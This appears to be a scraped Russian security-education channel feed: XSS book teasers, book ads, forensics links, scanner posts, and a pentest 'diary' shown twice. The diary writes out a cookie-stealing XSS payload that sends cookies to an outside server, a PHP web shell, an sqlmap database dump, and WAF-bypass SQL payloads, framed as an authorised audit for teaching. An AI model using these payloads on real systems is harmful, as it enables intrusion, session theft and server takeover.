#blog
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг
Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS переносит игру на новый уровень. Здесь зломышленник общается не с сервером, а с самим браузером и его JavaScript-кодом. Вся магия происходит уже после того, как пользователь загрузил страницу. Это современный, коварный, и зачастую невидимый для стандартных защит тип уязвимости. Добро пожаловать в адскую смесь легаси-джаваскрипта, фреймворков и client-side багов.
https://vk.com/@hacker_timcore-kniga-ve-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
#books
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг
Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS переносит игру на новый уровень. Здесь зломышленник общается не с сервером, а с самим браузером и его JavaScript-кодом. Вся магия происходит уже после того, как пользователь загрузил страницу. Это современный, коварный, и зачастую невидимый для стандартных защит тип уязвимости. Добро пожаловать в адскую смесь легаси-джаваскрипта, фреймворков и client-side багов.
https://vk.com/@hacker_timcore-kniga-ve-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
VK
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг
Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS перенос..
Эй, хакеры, кодеры и те, кто рвётся в мир эксплойтов! 🔥
Я — Михаил Тарасов (Timcore), и я решил прокачать Вашу библиотеку знаний. Бесплатно раздаю 9 своих авторских книг по хакингу, CTF, уязвимостям и программированию. Это не вода — это чистый хардкор: от SQL-инъекций до Rust-хаков. Хочешь прокачать скиллы и ломать системы как профи? Лови шанс, пока не поздно!
Вот что ты получишь в рассылке (PDF формат):
1. Capture the Flag (CTF). VulnHub 8 райтапов — Реальные walkthroughs для тренировок на VulnHub.
2. Cross Site Request Forgery — Как эксплуатировать CSRF и защищаться от него.
3. Программирование на Go для начинающих — Быстрый старт в Go для автоматизации.
4. Программирование на PHP8 для начинающих — Современный PHP для веб-эксплойтов.
5. Программирование на С для начинающих — База для low-level хаков.
6. Прохождение CTF Мистер Робот Практический курс — Шаг за шагом по легендарному CTF.
7. Уязвимость SQL-инъекция. Практическое руководство для хакеров — Эксплойты SQLi в действии.
8. Уязвимость-Cross-Site-Scripting-XSS-Практическое-руководство — XSS от А до Я, с примерами.
9. Хакинг на Rust — Безопасный и мощный Rust для пентеста.
Это не просто книги — это твои инструменты для доминирования в CTF, поиска уязвимостей и создания своих эксплойтов. Я написал их на основе реального опыта: ломал, фиксил, учил других. Бесплатно? Да, потому что знания должны быть доступны. Но только для тех, кто готов действовать!
Как забрать? по контакту в телеграм: @timcore1: "Хочу книги Timcore" — и я пришлю ссылку на скачивание. Не тяни, раздача ограничена!
#хакинг #CTF #эксплойты #программирование #Timcore
Поделись с друзьями — пусть все прокачаются! 🚀
Я — Михаил Тарасов (Timcore), и я решил прокачать Вашу библиотеку знаний. Бесплатно раздаю 9 своих авторских книг по хакингу, CTF, уязвимостям и программированию. Это не вода — это чистый хардкор: от SQL-инъекций до Rust-хаков. Хочешь прокачать скиллы и ломать системы как профи? Лови шанс, пока не поздно!
Вот что ты получишь в рассылке (PDF формат):
1. Capture the Flag (CTF). VulnHub 8 райтапов — Реальные walkthroughs для тренировок на VulnHub.
2. Cross Site Request Forgery — Как эксплуатировать CSRF и защищаться от него.
3. Программирование на Go для начинающих — Быстрый старт в Go для автоматизации.
4. Программирование на PHP8 для начинающих — Современный PHP для веб-эксплойтов.
5. Программирование на С для начинающих — База для low-level хаков.
6. Прохождение CTF Мистер Робот Практический курс — Шаг за шагом по легендарному CTF.
7. Уязвимость SQL-инъекция. Практическое руководство для хакеров — Эксплойты SQLi в действии.
8. Уязвимость-Cross-Site-Scripting-XSS-Практическое-руководство — XSS от А до Я, с примерами.
9. Хакинг на Rust — Безопасный и мощный Rust для пентеста.
Это не просто книги — это твои инструменты для доминирования в CTF, поиска уязвимостей и создания своих эксплойтов. Я написал их на основе реального опыта: ломал, фиксил, учил других. Бесплатно? Да, потому что знания должны быть доступны. Но только для тех, кто готов действовать!
Как забрать? по контакту в телеграм: @timcore1: "Хочу книги Timcore" — и я пришлю ссылку на скачивание. Не тяни, раздача ограничена!
#хакинг #CTF #эксплойты #программирование #Timcore
Поделись с друзьями — пусть все прокачаются! 🚀
#forensics
Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него
А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей воспринимают интернет как магию: ввел адрес — получил котиков. А то, что в это время их умный чайник отправляет отчет о ваших чаепитиях на китайский сервер, — дело десятое.
Что ж, садитесь поудобнее. Сейчас я выдам вам базовый набор юного сетевого потрошителя. Будем вскрывать цифровые потроха вашего подключения. Но сначала — минутка занудства, без которой моя совесть (и адвокат) не будут спать спокойно.
Подробнее: https://timforensics.ru/setevoj-potroshitel-kak-vskryt-trafik-i-uvidet-vsyo-chto-lezet-v-tvoj-internet-i-iz-nego/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него
А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей воспринимают интернет как магию: ввел адрес — получил котиков. А то, что в это время их умный чайник отправляет отчет о ваших чаепитиях на китайский сервер, — дело десятое.
Что ж, садитесь поудобнее. Сейчас я выдам вам базовый набор юного сетевого потрошителя. Будем вскрывать цифровые потроха вашего подключения. Но сначала — минутка занудства, без которой моя совесть (и адвокат) не будут спать спокойно.
Подробнее: https://timforensics.ru/setevoj-potroshitel-kak-vskryt-trafik-i-uvidet-vsyo-chto-lezet-v-tvoj-internet-i-iz-nego/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Форензика
Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него | Форензика
А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей
#forensics
Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)
Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один неверный бит может остановить целый завод, обесточить город или превратить химкомбинат в локальный Чернобыль. Промышленные системы управления (ICS/SCADA) — это та самая критическая инфраструктура, о которой все говорят, когда упоминают кибервойны.
Подробнее: https://timforensics.ru/kiber-apokalipsis-na-zavode-forenzika-promyshlennyh-sistem-ics-scada/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)
Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один неверный бит может остановить целый завод, обесточить город или превратить химкомбинат в локальный Чернобыль. Промышленные системы управления (ICS/SCADA) — это та самая критическая инфраструктура, о которой все говорят, когда упоминают кибервойны.
Подробнее: https://timforensics.ru/kiber-apokalipsis-na-zavode-forenzika-promyshlennyh-sistem-ics-scada/
Другие наши проекты:
https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/
👨💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).
Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance
Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
Форензика
Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA) | Форензика
Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один
🔍 ДНЕВНИК ХАКЕРА | Как я взломал корпоративный сайт за 4 часа (под NDA, но расскажу) 💻🔥
Привет, банда! Сегодня история из моей практики — реальный аудит безопасности коммерческого проекта. Имена и домены не светлю (NDA жёстче, чем файрвол Cisco), но сценарий покажу во всей красе 😎.
🎯 Как всё началось: клиент в панике
Звонок в 10 утра: «У нас веб-приложение для финтеха, нужен срочный пентест перед запуском». Говорю: «Окей, давайте scope и доступ». Получаю staging-среду, логин-пароль от тестового аккаунта и напутствие: «Только не роняйте прод, пожалуйста» 😅 .
🔍 Разведка: первые 30 минут
Захожу на сайт — сразу включаю Burp Suite, ставлю на перехват всего трафика. Кликаю по функциям: регистрация, логин, профиль, транзакции. Смотрю на запросы — и тут БАЦ! Вижу параметр
Думаю: «Это же классический IDOR, ребят, вы серьёзно?». Меняю
💀 Копаем глубже: SQL-инъекция как десерт
Дальше проверяю форму поиска транзакций. Ввожу
sqlmap -u "https://target.com/transactions?date=2025-01-01" --dbs --batch
За 10 минут дамплю список баз данных:
🔐 XSS + Session Hijacking: комбо для красоты
Захожу в раздел «Комментарии к платежам». Закидываю туда
<script>document.location='http://myserver.com/?c='+document.cookie</script>
Обновляю страницу от имени админа (через тестовый доступ) — и вижу, как мой сервер получил сессионную куку 🍪. HttpOnly флага нет, Secure тоже. Красота! Теперь можно перехватить сессию реального юзера через XSS.
🚀 File Upload: шелл за 5 минут
Есть функция загрузки документов для верификации аккаунта. Пробую залить PHP-шелл вместо PDF :
1. Создаю
<?php system($_GET['cmd']); ?>
2. Переименовываю в
3. Меняю MIME-тип через Burp на
Открываю
🛡 WAF bypass: потому что могу
На одном из этапов натыкаюсь на ModSecurity . Блочит стандартные SQL-пейлоады. Что делаю? Обфусцирую:
' uNiOn SeLeCt 1,2,3--
Или двойное кодирование:
%2527%20OR%201=1--
WAF пропускает — думаю: «Ну что за настройки из коробки, ребята» 😏.
📋 Финал: отчёт и рекомендации
Через 4 часа у меня список из 12 уязвимостей:
• 3 Critical (IDOR, SQL Injection, RCE через file upload) 🔥
• 5 High (XSS, Session Hijacking, CORS misconfiguration) ⚠️
• 4 Medium (информационные утечки, слабые пароли по дефолту) 📌
Собираю отчёт с PoC для каждой дыры, скриншотами и рекомендациями: «Используйте parameterized queries, проверяйте авторизацию на бэке, добавьте HttpOnly/Secure для кук». Отправляю клиенту. Ответ: «Мы в шоке. Спасибо, что не хакеры нашли первыми» 😅.
💡 Мораль: аудит — это не формальность
Каждый раз, когда кто-то говорит «у нас всё защищено», я вспоминаю этот кейс. OWASP Top 10 — это не миф, это реальность 2025 года. И да, если у вас нет пентеста перед запуском — вы просто ждёте, когда вас сломают 🚨.
P.S. Этот кейс под NDA, так что все детали обезличены. Но методология рабочая — можете тестировать на своих проектах (с разрешением, конечно) 😎🔥 .
Привет, банда! Сегодня история из моей практики — реальный аудит безопасности коммерческого проекта. Имена и домены не светлю (NDA жёстче, чем файрвол Cisco), но сценарий покажу во всей красе 😎.
🎯 Как всё началось: клиент в панике
Звонок в 10 утра: «У нас веб-приложение для финтеха, нужен срочный пентест перед запуском». Говорю: «Окей, давайте scope и доступ». Получаю staging-среду, логин-пароль от тестового аккаунта и напутствие: «Только не роняйте прод, пожалуйста» 😅 .
🔍 Разведка: первые 30 минут
Захожу на сайт — сразу включаю Burp Suite, ставлю на перехват всего трафика. Кликаю по функциям: регистрация, логин, профиль, транзакции. Смотрю на запросы — и тут БАЦ! Вижу параметр
user_id=1234 в URL при открытии личного кабинета 👀.Думаю: «Это же классический IDOR, ребят, вы серьёзно?». Меняю
1234 на 1235 — БАМ, открывается чужой профиль с данными карты, ФИО, балансом 💣. Скриншот, записал в блокнот — это уже Critical severity.💀 Копаем глубже: SQL-инъекция как десерт
Дальше проверяю форму поиска транзакций. Ввожу
' OR 1=1-- в поле даты — сайт выдаёт ошибку MySQL с названием таблицы 😂. Запускаю SQLMap:sqlmap -u "https://target.com/transactions?date=2025-01-01" --dbs --batch
За 10 минут дамплю список баз данных:
users, payments, admin_logs. Думаю: «Админы, вы вообще про prepared statements слышали?»🔐 XSS + Session Hijacking: комбо для красоты
Захожу в раздел «Комментарии к платежам». Закидываю туда
<script>document.location='http://myserver.com/?c='+document.cookie</script>
Обновляю страницу от имени админа (через тестовый доступ) — и вижу, как мой сервер получил сессионную куку 🍪. HttpOnly флага нет, Secure тоже. Красота! Теперь можно перехватить сессию реального юзера через XSS.
🚀 File Upload: шелл за 5 минут
Есть функция загрузки документов для верификации аккаунта. Пробую залить PHP-шелл вместо PDF :
1. Создаю
shell.php<?php system($_GET['cmd']); ?>
2. Переименовываю в
shell.php.pdf — не прошло.3. Меняю MIME-тип через Burp на
application/pdf — PROFIT! Файл залился 🎉.Открываю
https://target.com/uploads/shell.php?cmd=whoami — получаю ответ от сервера. Доступ к системе есть 💻.🛡 WAF bypass: потому что могу
На одном из этапов натыкаюсь на ModSecurity . Блочит стандартные SQL-пейлоады. Что делаю? Обфусцирую:
' uNiOn SeLeCt 1,2,3--
Или двойное кодирование:
%2527%20OR%201=1--
WAF пропускает — думаю: «Ну что за настройки из коробки, ребята» 😏.
📋 Финал: отчёт и рекомендации
Через 4 часа у меня список из 12 уязвимостей:
• 3 Critical (IDOR, SQL Injection, RCE через file upload) 🔥
• 5 High (XSS, Session Hijacking, CORS misconfiguration) ⚠️
• 4 Medium (информационные утечки, слабые пароли по дефолту) 📌
Собираю отчёт с PoC для каждой дыры, скриншотами и рекомендациями: «Используйте parameterized queries, проверяйте авторизацию на бэке, добавьте HttpOnly/Secure для кук». Отправляю клиенту. Ответ: «Мы в шоке. Спасибо, что не хакеры нашли первыми» 😅.
💡 Мораль: аудит — это не формальность
Каждый раз, когда кто-то говорит «у нас всё защищено», я вспоминаю этот кейс. OWASP Top 10 — это не миф, это реальность 2025 года. И да, если у вас нет пентеста перед запуском — вы просто ждёте, когда вас сломают 🚨.
P.S. Этот кейс под NDA, так что все детали обезличены. Но методология рабочая — можете тестировать на своих проектах (с разрешением, конечно) 😎🔥 .
Здравствуйте, дорогие друзья.
Внимание. Акция!!!
Скидка 57% на мою электронную книгу, которая называется: «Библия начинающего Этичного хакера».
Акция продлится 3 дня, с 29 октября, и по 31 октября включительно.
Объем: 2144 страницы
Цена: 1500 рублей.
🔐💻 Взломай свой путь к знаниям с «Библией начинающего этичного хакера»! 💻🔐
Дорогие друзья! Сегодня хочу поделиться с Вами книгой, которая станет Вашим верным спутником в мире кибербезопасности – «Библия начинающего Этичного хакера». Эта книга – настоящее сокровище для тех, кто мечтает стать защитником цифрового пространства.
📘 Почему эта книга должна оказаться на Вашей полке?
1⃣ Она разделена на 9 увлекательных глав, которые погружают Вас в каждый аспект этичного хакинга.
2⃣ Вы начнете с основ и постепенно перейдете к более сложным темам – от идеального старта до мастерства.
3⃣ Каждая глава содержит практические задания, которые помогут закрепить полученные знания.
🛠 Главы книги охватывают различные темы:
Основы сетей и их безопасности.
Освоение инструментов для тестирования безопасности.
Техники сканирования и анализа уязвимостей.
Социальная инженерия и методы противодействия.
Веб-приложения и их уязвимости.
Инцидентный менеджмент и реагирование на инциденты.
Юридические аспекты и этические нормы в этичном хакинге.
👩💻👨💻 Хакерство не всегда означает что-то незаконное. Этичные хакеры – это специалисты, которые используют свои навыки для улучшения безопасности и защиты информации.
Не упустите возможность обучиться искусству этичного хакинга и принять участие в гонке вооружений 21 века, где Вашим оружием будет знание! 🏁
Объем: 2144 страницы
Цена: 1500 рублей.
Более подробное содержание вот тут: https://timcore.ru/2024/02/15/moja-novaja-kniga-biblija-nachinajushhego-jetichnogo-hakera/
Для приобретения пишите по контакту в телеграм: @timcore1
Внимание. Акция!!!
Скидка 57% на мою электронную книгу, которая называется: «Библия начинающего Этичного хакера».
Акция продлится 3 дня, с 29 октября, и по 31 октября включительно.
Объем: 2144 страницы
Цена: 1500 рублей.
🔐💻 Взломай свой путь к знаниям с «Библией начинающего этичного хакера»! 💻🔐
Дорогие друзья! Сегодня хочу поделиться с Вами книгой, которая станет Вашим верным спутником в мире кибербезопасности – «Библия начинающего Этичного хакера». Эта книга – настоящее сокровище для тех, кто мечтает стать защитником цифрового пространства.
📘 Почему эта книга должна оказаться на Вашей полке?
1⃣ Она разделена на 9 увлекательных глав, которые погружают Вас в каждый аспект этичного хакинга.
2⃣ Вы начнете с основ и постепенно перейдете к более сложным темам – от идеального старта до мастерства.
3⃣ Каждая глава содержит практические задания, которые помогут закрепить полученные знания.
🛠 Главы книги охватывают различные темы:
Основы сетей и их безопасности.
Освоение инструментов для тестирования безопасности.
Техники сканирования и анализа уязвимостей.
Социальная инженерия и методы противодействия.
Веб-приложения и их уязвимости.
Инцидентный менеджмент и реагирование на инциденты.
Юридические аспекты и этические нормы в этичном хакинге.
👩💻👨💻 Хакерство не всегда означает что-то незаконное. Этичные хакеры – это специалисты, которые используют свои навыки для улучшения безопасности и защиты информации.
Не упустите возможность обучиться искусству этичного хакинга и принять участие в гонке вооружений 21 века, где Вашим оружием будет знание! 🏁
Объем: 2144 страницы
Цена: 1500 рублей.
Более подробное содержание вот тут: https://timcore.ru/2024/02/15/moja-novaja-kniga-biblija-nachinajushhego-jetichnogo-hakera/
Для приобретения пишите по контакту в телеграм: @timcore1
#blog
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Blind XSS: играем в прятки с бэкенд-админом
Blind XSS — это та разновидность уязвимости, где ты закидываешь payload как крючок в темной воде и ждёшь, когда кто-то из бэкенда, модерации или саппорта случайно зацепится. В отличие от обычного XSS, здесь ты не видишь мгновенного триггера — атака срабатывает далеко от твоих глаз, часто спустя часы, дни, недели. Но когда она взрывается, ты получаешь доступ к тем, кто стоит за кулисами сайта: администраторам, сотрудникам службы поддержки, аналитику, внутренним системам. Это настоящая игра в прятки, где побеждает терпеливый и изобретательный.
https://vk.com/@-44038255-knigase-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l?subtype=primary
#xss
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Blind XSS: играем в прятки с бэкенд-админом
Blind XSS — это та разновидность уязвимости, где ты закидываешь payload как крючок в темной воде и ждёшь, когда кто-то из бэкенда, модерации или саппорта случайно зацепится. В отличие от обычного XSS, здесь ты не видишь мгновенного триггера — атака срабатывает далеко от твоих глаз, часто спустя часы, дни, недели. Но когда она взрывается, ты получаешь доступ к тем, кто стоит за кулисами сайта: администраторам, сотрудникам службы поддержки, аналитику, внутренним системам. Это настоящая игра в прятки, где побеждает терпеливый и изобретательный.
https://vk.com/@-44038255-knigase-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l?subtype=primary
VK
Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Blind XSS: играем в прятки с бэкенд-админом
Blind XSS — это та разновидность уязвимости, где ты закидываешь payload как крючок в темной воде и ждёшь, когда кто-то из бэкенда, модера..
#blog
#xss
Книга: «Все об уязвимости XSS». Глава 3: Как работает XSS — Анатомия атаки 🔬 • Same Origin Policy и почему XSS его обходит как WAF на выходных
Same Origin Policy (SOP) — это фундамент веб-безопасности. Его суть: сайт может взаимодействовать только с ресурсами своего домена, схемы и порта. SOP — тот самый “забор” между разными веб-приложениями, не позволяющий читать и менять данные другого сайта. Но весь прикол XSS — в том, что он взрывает эти стены, как, прости господи, школьник, который нашёл дыру в заборе.
https://vk.com/@hacker_timcore-kniga-vse-ob-uyazvimosti-xss-glava-3-kak-rabotaet-xss-anatom
#xss
Книга: «Все об уязвимости XSS». Глава 3: Как работает XSS — Анатомия атаки 🔬 • Same Origin Policy и почему XSS его обходит как WAF на выходных
Same Origin Policy (SOP) — это фундамент веб-безопасности. Его суть: сайт может взаимодействовать только с ресурсами своего домена, схемы и порта. SOP — тот самый “забор” между разными веб-приложениями, не позволяющий читать и менять данные другого сайта. Но весь прикол XSS — в том, что он взрывает эти стены, как, прости господи, школьник, который нашёл дыру в заборе.
https://vk.com/@hacker_timcore-kniga-vse-ob-uyazvimosti-xss-glava-3-kak-rabotaet-xss-anatom
VK
Книга: «Все об уязвимости XSS». Глава 3: Как работает XSS — Анатомия атаки 🔬 • Same Origin Policy и почему XSS его обходит как…
Same Origin Policy (SOP) — это фундамент веб-безопасности. Его суть: сайт может взаимодействовать только с ресурсами своего домена, схемы..
#blog
#go
🚀 Свой сканер директорий на Go: быстрее ffuf’а в 3 раза
Привет, хакеры! 💻 Устал ждать пока ffuf отсканирует 10 миллионов путей? Я написал свой directory scanner на Go и он в 3 раза быстрее ffuf’а при тех же настройках.
https://vk.com/@hacker_timcore-svoi-skaner-direktorii-na-go-bystree-ffufa-v-3-raza
#go
🚀 Свой сканер директорий на Go: быстрее ffuf’а в 3 раза
Привет, хакеры! 💻 Устал ждать пока ffuf отсканирует 10 миллионов путей? Я написал свой directory scanner на Go и он в 3 раза быстрее ffuf’а при тех же настройках.
https://vk.com/@hacker_timcore-svoi-skaner-direktorii-na-go-bystree-ffufa-v-3-raza
VK
🚀 Свой сканер директорий на Go: быстрее ffuf’а в 3 раза
Привет, хакеры! 💻 Устал ждать пока ffuf отсканирует 10 миллионов путей? Я написал свой directory scanner на Go и он в 3 раза быстрее ffuf..
#blog
#rust
🔥 Пишем высокоскоростной port scanner на Rust с async Tokio
Забудь про nmap, когда надо быстро. Rust + Tokio = сканим 65k портов за секунды, а не минуты.
💡 Зачем это вообще нужно?
Представь: тебе надо просканить пачку хостов на баг-баунти, а nmap тормозит как Win98 на Pentium II. Админы уже залатали дыру, пока ты ждал результатов. Rust с async I/O через Tokio делает конкурентные TCP-коннекты параллельно — без GIL, без тормозов, чисто турбо-режим.
https://vk.com/@hacker_timcore-pishem-vysokoskorostnoi-port-scanner-na-rust-s-async-tokio
#rust
🔥 Пишем высокоскоростной port scanner на Rust с async Tokio
Забудь про nmap, когда надо быстро. Rust + Tokio = сканим 65k портов за секунды, а не минуты.
💡 Зачем это вообще нужно?
Представь: тебе надо просканить пачку хостов на баг-баунти, а nmap тормозит как Win98 на Pentium II. Админы уже залатали дыру, пока ты ждал результатов. Rust с async I/O через Tokio делает конкурентные TCP-коннекты параллельно — без GIL, без тормозов, чисто турбо-режим.
https://vk.com/@hacker_timcore-pishem-vysokoskorostnoi-port-scanner-na-rust-s-async-tokio
VK
🔥 Пишем высокоскоростной port scanner на Rust с async Tokio
Забудь про nmap, когда надо быстро. Rust + Tokio = сканим 65k портов за секунды, а не минуты.